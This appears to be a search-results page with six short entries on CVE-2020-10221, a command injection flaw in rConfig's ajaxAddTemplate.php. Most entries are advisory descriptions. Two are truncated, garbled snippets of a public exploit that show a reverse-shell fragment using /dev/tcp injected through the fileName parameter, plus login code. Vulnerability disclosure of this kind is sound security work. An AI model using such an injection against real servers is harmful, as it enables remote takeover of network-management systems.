6 matches found
rConfig OS Command Injection Vulnerability
rConfig lib/ajaxHandlers/ajaxAddTemplate.php contains an OS command injection vulnerability that allows remote attackers to execute OS commands via shell metacharacters in the fileName POST parameter...
Code injection
rConfig 3.9.4 and earlier allows authenticated code execution of system commands by sending a forged GET request to lib/ajaxHandlers/ajaxAddTemplate.php or lib/ajaxHandlers/ajaxEditTemplate.php...
rConfig 3.93 - ajaxAddTemplate.php Authenticated Remote Code Execution
rConfig 3.93 - ajaxAddTemplate.php Authenticated Remote Code Execution Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp//...
rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login = 'user':user, 'pass':password, 'sublogin':'1' r...
CVE-2020-10221
CVE-2020-10221 (rConfig) is a remote code execution vulnerability in the rConfig utility. Multiple connected sources confirm that lib/ajaxHandlers/ajaxAddTemplate.php contains an OS command injection flaw that allows an attacker to execute arbitrary OS commands, by injecting shell metacharacters ...
CVE-2020-10221
lib/ajaxHandlers/ajaxAddTemplate.php in rConfig through 3.94 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the fileName POST parameter...